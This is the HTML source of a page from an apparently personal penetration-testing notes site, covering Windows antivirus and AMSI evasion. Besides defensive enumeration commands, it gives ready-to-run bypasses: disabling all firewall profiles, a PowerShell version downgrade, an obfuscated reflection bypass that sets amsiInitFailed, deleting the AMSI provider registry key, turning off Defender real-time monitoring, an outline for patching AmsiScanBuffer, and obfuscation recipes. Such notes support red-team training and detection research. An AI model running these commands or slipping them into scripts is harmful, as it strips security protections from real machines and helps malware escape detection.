2022-09-02 09:05:59 +02:00
<!doctype html>
< html lang = "en" >
< center >
< head >
< script src = "https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js" > < / script >
2022-09-09 15:41:05 +02:00
< script src = "https://code.jquery.com/jquery-3.5.1.min.js" > < / script >
< script type = "text/javascript" src = "/static/js/auto-complete.js" > < / script >
< script type = "text/javascript" src = "/static/js/lunr.min.js" > < / script >
< script type = "text/javascript" src = "/static/js/search.js" > < / script >
2022-09-02 09:05:59 +02:00
< link rel = "stylesheet" href = "/static/stylesheet.css" >
< link rel = "stylesheet" href = "/static/auto-complete.css" >
< br >
2022-09-09 15:41:05 +02:00
< title > The Real Hugo< / title >
2022-09-02 09:05:59 +02:00
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
< / head >
< body >
<!-- topmenu -->
< div class = "menu" >
2022-09-09 15:41:05 +02:00
< a href = "/" style = "text-decoration:none" > Husk< / a >
2022-09-02 09:05:59 +02:00
< / div >
< div class = "search-container" >
< label for = "search-by" > < i class = "fas fa-search" > < / i > < / label >
< input data-search-input = "" id = "search-by" type = "search" placeholder = "Search..." autocomplete = "off" >
<!-- button type="submit"><i class="search"></i>🔍</button> -->
< span data-search-clear = "" > < i class = "fas fa-times" > < / i > < / span >
< / div >
< / div >
< div class = "menu" >
< / div >
<!-- br><br -->
< / center >
< p > < / p >
< div class = "columns" >
<!-- Sidebar -->
< div class = "column column-1" >
2022-09-09 15:41:05 +02:00
< ul > < details id = enumeration ontoggle = "linkClick(this); return false;" > < summary > Enumeration< / summary > < ul > < details id = containers ontoggle = "linkClick(this); return false;" > < summary > Containers< / summary > < ul > < / ul > < / details > < details id = docs ontoggle = "linkClick(this); return false;" > < summary > Docs< / summary > < ul > < li > < a href = "/enumeration/docs/aws.html" > aws< / a > < / li > < li > < a href = "/enumeration/docs/cewl.html" > cewl< / a > < / li > < li > < a href = "/enumeration/docs/dns.html" > dns< / a > < / li > < li > < a href = "/enumeration/docs/docker_enumeration.html" > docker_enumeration< / a > < / li > < li > < a href = "/enumeration/docs/ffuf.html" > ffuf< / a > < / li > < li > < a href = "/enumeration/docs/gobuster.html" > gobuster< / a > < / li > < li > < a href = "/enumeration/docs/kerberoast.html" > kerberoast< / a > < / li > < li > < a href = "/enumeration/docs/kubectl.html" > kubectl< / a > < / li > < li > < a href = "/enumeration/docs/ldap.html" > ldap< / a > < / li > < li > < a href = "/enumeration/docs/linux_basics.html" > linux_basics< / a > < / li > < li > < a href = "/enumeration/docs/microk8s.html" > microk8s< / a > < / li > < li > < a href = "/enumeration/docs/nfs.html" > nfs< / a > < / li > < li > < a href = "/enumeration/docs/nikto.html" > nikto< / a > < / li > < li > < a href = "/enumeration/docs/nmap.html" > nmap< / a > < / li > < li > < a href = "/enumeration/docs/port_knocking.html" > port_knocking< / a > < / li > < li > < a href = "/enumeration/docs/rpcclient.html" > rpcclient< / a > < / li > < li > < a href = "/enumeration/docs/rsync.html" > rsync< / a > < / li > < li > < a href = "/enumeration/docs/rustscan.html" > rustscan< / a > < / li > < li > < a href = "/enumeration/docs/shodan.html" > shodan< / a > < / li > < details id = snmp ontoggle = "linkClick(this); return false;" > < summary > Snmp< / summary > < ul > < li > < a href = "/enumeration/docs/snmp/onesixtyone.html" > onesixtyone< / a > < / li > < li > < a href = "/enumeration/docs/snmp/snmpcheck.html" > snmpcheck< / a > < / li > < / ul > < / details > < li > < a href = "/enumeration/docs/websites.html" > websites< / a > < / li > < li > < a href = "/enumeration/docs/wfuzz.html" > wfuzz< / a > < / li > < li > < a href = "/enumeration/docs/wpscan.html" > wpscan< / a > < / li > < / ul > < / details > < details id = network_scanners ontoggle = "linkClick(this); return false;" > < summary > Network_scanners< / summary > < ul > < / ul > < / details > < details id = windows ontoggle = "linkClick(this); return false;" > < summary > Windows< / summary > < ul > < li > < a href = "/enumeration/windows/bloodhound.html" > bloodhound< / a > < / li > < li > < a href = "/enumeration/windows/event_log.html" > event_log< / a > < / li > < li > < a href = "/enumeration/windows/manual_enum.html" > manual_enum< / a > < / li > < li > < a href = "/enumeration/windows/powershell.html" > powershell< / a > < / li > < li > < a href = "/enumeration/windows/rpcclient.html" > rpcclient< / a > < / li > < li > < a href = "/enumeration/windows/sysinternals.html" > sysinternals< / a > < / li > < li > < a href = "/enumeration/windows/sysmon.html" > sysmon< / a > < / li > < li > < a href = "/enumeration/windows/vss.html" > vss< / a > < / li > < / ul > < / details > < / ul > < / details > < details id = exploit ontoggle = "linkClick(this); return false;" > < summary > Exploit< / summary > < ul > < details id = CPUs ontoggle = "linkClick(this); return false;" > < summary > CPUs< / summary > < ul > < li > < a href = "/exploit/CPUs/meltdown.html" > meltdown< / a > < / li > < / ul > < / details > < details id = binaries ontoggle = "linkClick(this); return false;" > < summary > Binaries< / summary > < ul > < li > < a href = "/exploit/binaries/Shellcode.html" > Shellcode< / a > < / li > < li > < a href = "/exploit/binaries/aslr.html" > aslr< / a > < / li > < details id = buffer_overflow ontoggle = "linkClick(this); return false;" > < summary > Buffer_overflow< / summary > < ul > < details id = docs ontoggle = "linkClick(this); return false;" > < summary > Docs< / summary > < ul > < li > < a href = "/exploit/binaries/buffer_overflow/docs/amd64.html" > amd64< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/amd64_instructions.html" > amd64_instructions< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/buffer_overflow.html" > buffer_overflow< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html" > cut_stack_in_half< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html" > pwntools_specifics< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html" > ret_address_reuse< / a > < / li > < / ul > < / details > < li > < a href = "/exploit/binaries/buffer_overflow/ropping.html" > ropping< / a > < / li > < / ul > < / details > < details id = canary_bypass ontoggle = "l
2022-09-02 09:05:59 +02:00
< / ul >
< / div >
< div class = "column column-2" >
< span class = "body" >
< style > p r e { l i n e - h e i g h t : 1 2 5 % ; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */< / style >
< div class = "column column-3" >
< ul >
< li > < a href = "#antivirus-evasion" > Antivirus Evasion< / a > < ul >
< li > < a href = "#enumeration" > Enumeration< / a > < / li >
< li > < a href = "#reset-options" > Reset Options< / a > < / li >
< li > < a href = "#anti-malware-secure-interface" > Anti Malware Secure Interface< / a > < ul >
< li > < a href = "#return-resultresponse-codes" > Return Result/Response Codes< / a > < / li >
< li > < a href = "#powershell-downgrade-attack" > PowerShell Downgrade Attack< / a > < / li >
< li > < a href = "#reflection-bypass" > Reflection Bypass< / a > < / li >
< li > < a href = "#amsi-scanbuffer-patch" > AMSI ScanBuffer patch< / a > < / li >
< li > < a href = "#other-bypasses-and-tools" > Other Bypasses and Tools< / a > < / li >
< li > < a href = "#validate" > Validate< / a > < / li >
< li > < a href = "#further-obfuscation" > Further Obfuscation< / a > < ul >
< li > < a href = "#type-obfuscation" > Type Obfuscation< / a > < / li >
< / ul >
< / li >
< li > < a href = "#automated-obfuscation" > Automated Obfuscation< / a > < ul >
< li > < a href = "#powershell" > Powershell< / a > < / li >
< li > < a href = "#other-obfuscation" > Other Obfuscation< / a > < / li >
< / ul >
< / li >
< / ul >
< / li >
< li > < a href = "#links" > Links< / a > < / li >
< / ul >
< / li >
< / ul >
< / div >
< h1 id = "antivirus-evasion" > Antivirus Evasion< / h1 >
< ul >
< li >
< p > Existing types< / p >
< ul >
< li > On-Disk evasion< / li >
< li > In-Memory evasion< / li >
< / ul >
< / li >
< li >
< p > Detection Methods< / p >
< ul >
< li > Static Detection -- Hash or String/Byte Matching < / li >
< li > Dynamic -- predefined rules, run inside a sandbox, querying API and syscalls at runtime< / li >
< li > Heuristic / Behaviourial Detection -- threshold hits by either static comparison of decompiled code or dynamically analyzed software< / li >
< / ul >
< / li >
< li >
< p > Additional Features< / p >
< ul >
< li > Unpacker -- decrypting and decompress< / li >
< li > PE header parser -- portable executable headers are parsed< / li >
< li > Emulation -- analysis in an emulated env< / li >
< / ul >
< / li >
< / ul >
< h2 id = "enumeration" > Enumeration< / h2 >
< div class = "codehilite" > < pre > < span > < / span > < code > wmic /namespace:< span class = "se" > \\< / span > root< span class = "se" > \s< / span > ecuritycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > Get-Service WinDefend
Get-MpComputerStatus < span class = "p" > |< / span > < span class = "k" > select< / span > RealTimeProtectionEnabled
< / code > < / pre > < / div >
< ul >
< li > Check firewall< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > Get-NetFirewallProfile < span class = "p" > |< / span > Format-Table Name, Enabled
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > Get-NetFirewallRule < span class = "p" > |< / span > < span class = "k" > select< / span > DisplayName, Enabled, Description
< / code > < / pre > < / div >
< ul >
< li > Check inbound port availability< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > Test-NetConnection -ComputerName < span class = "m" > 127< / span > .0.0.1 -Port < span class = "m" > 80< / span >
< / code > < / pre > < / div >
< ul >
< li > Check Windows Defender and its active rules< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > powershell -c < span class = "s2" > " Get-MpPreference" < / span >
powershell -c < span class = "s2" > " Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Id< / span >
< / code > < / pre > < / div >
< ul >
< li > Check tamper protection, and < a href = "https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d#file-doh-ps1" > bypass< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > reg query < span class = "s2" > " HKLM\Software\Microsoft\Windows Defender\Features" < / span > /v TamperProtection
< / code > < / pre > < / div >
< h2 id = "reset-options" > Reset Options< / h2 >
< div class = "codehilite" > < pre > < span > < / span > < code > Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
< / code > < / pre > < / div >
< h2 id = "anti-malware-secure-interface" > Anti Malware Secure Interface< / h2 >
< ul >
< li > Powershell .NET runtime detection measure of windows. Scans code before executed.< / li >
< li > https://docs.microsoft.com/en-us/windows/win32/amsi/< / li >
< li > https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions< / li >
< li > https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream< / li >
< li > Integrated inside components< ul >
< li > User Account Control (UAC)< / li >
< li > Powershell< / li >
< li > Windows Script Host (wscript, csrcipt)< / li >
< li > JavaScript and VBScript< / li >
< li > VBA macros< / li >
< / ul >
< / li >
< li >
< p > < code > System.Management.Automation.dll< / code > < / p >
< / li >
< li >
< p > Flow< / p >
< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "w" > < / span > < span class = "o" > |< / span > < span class = "w" > < / span > < span class = "n" > Win32< / span > < span class = "w" > < / span > < span class = "n" > API< / span > < span class = "w" > < / span > < span class = "o" > |< / span > < span class = "w" > < / span > < span class = "n" > COM< / span > < span class = "w" > < / span > < span class = "n" > API< / span > < span class = "w" > < / span > < span class = "o" > |< / span > < span class = "w" > < / span > < span class = "n" > AV< / span > < span class = "w" > < / span > < span class = "n" > Provider< / span > < span class = "w" > < / span > < span class = "o" > |< / span > < span class = "w" > < / span >
< span class = "n" > Interpreter< / span > < span class = "w" > < / span > < span class = "o" > --> < / span > < span class = "w" > < / span > < span class = "n" > AMSIScanBuffer< / span > < span class = "w" > < / span > < span class = "o" > --> < / span > < span class = "w" > < / span > < span class = "n" > AMSIScanString< / span > < span class = "w" > < / span > < span class = "o" > --> < / span > < span class = "w" > < / span > < span class = "n" > IAntiMalware< / span > < span class = "o" > ::< / span > < span class = "kr" > Scan< / span > < span class = "p" > ()< / span > < span class = "w" > < / span > < span class = "o" > --> < / span > < span class = "w" > < / span > < span class = "n" > IAntiMalwareProvider< / span > < span class = "o" > ::< / span > < span class = "kr" > Scan< / span > < span class = "p" > ()< / span > < span class = "w" > < / span >
< / code > < / pre > < / div >
< h3 id = "return-resultresponse-codes" > Return Result/Response Codes< / h3 >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "n" > AMSI_RESULT_CLEAN< / span > < span class = "o" > =< / span > < span class = "mi" > 0< / span >
< span class = "n" > AMSI_RESULT_NOT_DETECTED< / span > < span class = "o" > =< / span > < span class = "mi" > 1< / span >
< span class = "n" > AMSI_RESULT_BLOCKED_BY_ADMIN_START< / span > < span class = "o" > =< / span > < span class = "mi" > 16384< / span >
< span class = "n" > AMSI_RESULT_BLOCKED_BY_ADMIN_END< / span > < span class = "o" > =< / span > < span class = "mi" > 20479< / span >
< span class = "n" > AMSI_RESULT_DETECTED< / span > < span class = "o" > =< / span > < span class = "mi" > 32768< / span >
< / code > < / pre > < / div >
< h3 id = "powershell-downgrade-attack" > PowerShell Downgrade Attack< / h3 >
< ul >
< li > Downgrade Powershell version to 2.0, where no AMSI is implemented< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > PowerShell -Version < span class = "m" > 2< / span >
< / code > < / pre > < / div >
< ul >
< li > < a href = "https://github.com/trustedsec/unicorn" > Unicorn< / a > does leverage this< / li >
< / ul >
< h3 id = "reflection-bypass" > Reflection Bypass< / h3 >
< ul >
< li > Varying string concatenation and camelCasing variations of the following string by Matt Graeber< / li >
< li > < a href = "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/" > Matt Graeber's Reflection< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "o" > [< / span > Ref< span class = "o" > ]< / span > .Assembly.GetType< span class = "o" > (< / span > < span class = "s1" > ' System.Management.Automation.AmsiUtils' < / span > < span class = "o" > )< / span > .GetField< span class = "o" > (< / span > < span class = "s1" > ' amsiInitFailed' < / span > ,< span class = "s1" > ' NonPublic,Static' < / span > < span class = "o" > )< / span > .SetValue< span class = "o" > (< / span > < span class = "nv" > $null< / span > ,< span class = "nv" > $true< / span > < span class = "o" > )< / span >
< / code > < / pre > < / div >
< p > or an obfuscated version< / p >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "o" > [< / span > Ref< span class = "o" > ]< / span > .Assembly.GetType< span class = "o" > (< / span > < span class = "s1" > ' System.Management.Automation.' < / span > +< span class = "k" > $(< / span > < span class = "o" > [< / span > Text.Encoding< span class = "o" > ]< / span > ::Unicode.GetString< span class = "o" > ([< / span > Convert< span class = "o" > ]< / span > ::FromBase64String< span class = "o" > (< / span > < span class = "s1" > ' QQBtAHMAaQBVAHQAaQBsAHMA' < / span > < span class = "k" > )< / span > < span class = "o" > )))< / span > .GetField< span class = "o" > (< / span > < span class = "k" > $(< / span > < span class = "o" > [< / span > Text.Encoding< span class = "o" > ]< / span > ::Unicode.GetString< span class = "o" > ([< / span > Convert< span class = "o" > ]< / span > ::FromBase64String< span class = "o" > (< / span > < span class = "s1" > ' YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==' < / span > < span class = "k" > )< / span > < span class = "o" > ))< / span > ,< span class = "s1" > ' NonPublic,Static' < / span > < span class = "o" > )< / span > .SetValue< span class = "o" > (< / span > < span class = "nv" > $null< / span > ,< span class = "nv" > $true< / span > < span class = "o" > )< / span >
Remove-Item -Path < span class = "s2" > " HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" < / span > -Recurse
Set-MpPreference -DisableRealtimeMonitoring < span class = "nv" > $true< / span >
< / code > < / pre > < / div >
< h3 id = "amsi-scanbuffer-patch" > AMSI ScanBuffer patch< / h3 >
< ul >
< li > Patching < code > amsi.dll< / code > , which is loaded at Powershell startup< / li >
< li >
< p > AMSI ScanBuffer is delivered to < code > amsi.dll< / code > < / p >
< / li >
< li >
< p > Get handle of < code > amsi.dll< / code > < / p >
< / li >
< li > Get process address of AmsiScanBuffer< / li >
< li > Modify mem protection of AmsiScanBuffer< / li >
< li >
< p > Write opcode to AMSIScanBuffer< / p >
< / li >
< li >
< p > < a href = "https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py" > BC-Security's AMSI bypass< / a > < / p >
< / li >
< li > < a href = "https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs" > RastaMouse's AMSI bypass< / a > < / li >
< / ul >
< h3 id = "other-bypasses-and-tools" > Other Bypasses and Tools< / h3 >
< ul >
< li >
< p > < a href = "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git" > S3cur3Th1sSh1t< / a > < / p >
< / li >
< li >
< p > < a href = "http://amsi.fail/" > amsifail< / a > generates obfuscated snippets< / p >
< / li >
< / ul >
< h3 id = "validate" > Validate< / h3 >
< ul >
< li > < a href = "https://github.com/RythmStick/AMSITrigger" > AMSITrigger< / a > identifies strings which trigger the AMSI functions< / li >
< li > Validate Obfuscation and check which strings trigger AMSI< / li >
< li > < a href = "https://github.com/RythmStick/AMSITrigger" > AMSITrigger Repo< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > .< span class = "se" > \\< / span > AMSITrigger.exe -u < URL> -f < span class = "m" > 1< / span >
< / code > < / pre > < / div >
< p > or< / p >
< div class = "codehilite" > < pre > < span > < / span > < code > .< span class = "se" > \\< / span > AMSITrigger.exe -i < file> -f < span class = "m" > 1< / span >
< / code > < / pre > < / div >
< h3 id = "further-obfuscation" > Further Obfuscation< / h3 >
< ul >
< li > String concatenation< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "nv" > $OBF< / span > < span class = "o" > =< / span > < span class = "s1" > ' Ob' < / span > + < span class = "s1" > ' fu' < / span > + < span class = "s1" > ' s' < / span > +< span class = "s1" > ' cation' < / span >
< / code > < / pre > < / div >
< ul >
< li > < code > Concatenate - ('co'+'ffe'+'e')< / code > < / li >
< li > < code > Reorder - ('{1}{0}'-f'ffee','co')< / code > < / li >
< li > < code > Whitespace - ( 'co' +'fee' + 'e')< / code > < / li >
< / ul >
< h4 id = "type-obfuscation" > Type Obfuscation< / h4 >
< ul >
< li > .NET has type accelerators as aliases for types to shorten them and break the signature.< / li >
< li > < a href = "https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell" > idera< / a > < / li >
< li > < a href = "https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html" > 0x00-0x00< / a > < / li >
< li >
< p > < a href = "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1" > Documentation at microsoft< / a > < / p >
< / li >
< li >
< p > Example< / p >
< ul >
< li > Without< / li >
< / ul >
< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "o" > [< / span > system.runtime.interopservices.marshal< span class = "o" > ]< / span > ::copy< span class = "o" > (< / span > < span class = "nv" > $buf< / span > , < span class = "m" > 0< / span > , < span class = "nv" > $BufferAddress< / span > , < span class = "m" > 6< / span > < span class = "o" > )< / span > < span class = "p" > ;< / span >
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > * With
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "o" > [< / span > dorkstork< span class = "o" > ]< / span > ::copy< span class = "o" > (< / span > < span class = "nv" > $buf< / span > , < span class = "m" > 0< / span > , < span class = "nv" > $BufferAddress< / span > , < span class = "m" > 6< / span > < span class = "o" > )< / span > < span class = "p" > ;< / span >
< / code > < / pre > < / div >
< h3 id = "automated-obfuscation" > Automated Obfuscation< / h3 >
< h4 id = "powershell" > Powershell< / h4 >
< ul >
< li > < a href = "https://github.com/danielbohannon/Invoke-Obfuscation" > Invoke-Obfuscation< / a > < / li >
< li > < a href = "https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide" > Daniel's guide to Invoke-Obfuscation< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > Invoke-Obfuscation -ScriptBlock < span class = "o" > {< / span > < span class = "s1" > ' Payload Here' < / span > < span class = "o" > }< / span > -Command < span class = "s1" > ' Token\\String\\1,2,\\Whitespace\\1' < / span > -Quiet -NoExit
< / code > < / pre > < / div >
< ul >
< li > < a href = "https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation" > < strong > 8191 character limit< / strong > < / a > of command prompt must not be exceeded.< / li >
< / ul >
< h4 id = "other-obfuscation" > Other Obfuscation< / h4 >
< ul >
< li > Pinpoint bytes that will be flagged with < a href = "https://github.com/rasta-mouse/ThreatCheck" > ThreadCheck< / a > < ul >
< li > Has to be build via VS. Will output a ddll, an excutable and an XML file.< / li >
< li > < code > ThreatCheck.exe -f < file> < / code > < / li >
< / ul >
< / li >
< li > < a href = "https://github.com/matterpreter/DefenderCheck" > DefenderCheck< / a > < / li >
< / ul >
< h2 id = "links" > Links< / h2 >
< ul >
< li > < a href = "https://cmnatic.co.uk/" > cmnatic< / a > < / li >
< li > < a href = "https://resources.cmnatic.co.uk/Presentations/Dissertation/" > cmnatic's diss< / a > < / li >
< li > < a href = "https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/" > s3cur3th1ssh1t< / a > < / li >
< li > < a href = "https://amsi.fail/" > amsi.fail< / a > < / li >
< / ul >
< / span >
< / div >
< / div >
< div id = "footer" >
< p > < / p >
< center >
© Stefan Friese
< / center >
< / div >
< script >
2022-09-09 15:41:05 +02:00
function linkClick(obj) {
2022-09-02 09:05:59 +02:00
if (obj.open) {
2022-09-09 15:41:05 +02:00
//console.log('open');
2022-09-02 09:05:59 +02:00
if (sessionStorage.getItem(obj.id) & & !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
2022-09-09 15:41:05 +02:00
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
2022-09-02 09:05:59 +02:00
} else {
2022-09-09 15:41:05 +02:00
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
2022-09-02 09:05:59 +02:00
2022-09-09 15:41:05 +02:00
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length ; i + + ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
2022-09-02 09:05:59 +02:00
< / script >
2022-09-09 15:41:05 +02:00
< script async src = "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type = "text/javascript" > < / script >
2022-09-02 09:05:59 +02:00
< script type = "text/x-mathjax-config" >
2022-09-09 15:41:05 +02:00
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
< / script >
2022-09-02 09:05:59 +02:00
< / body >
< / html >
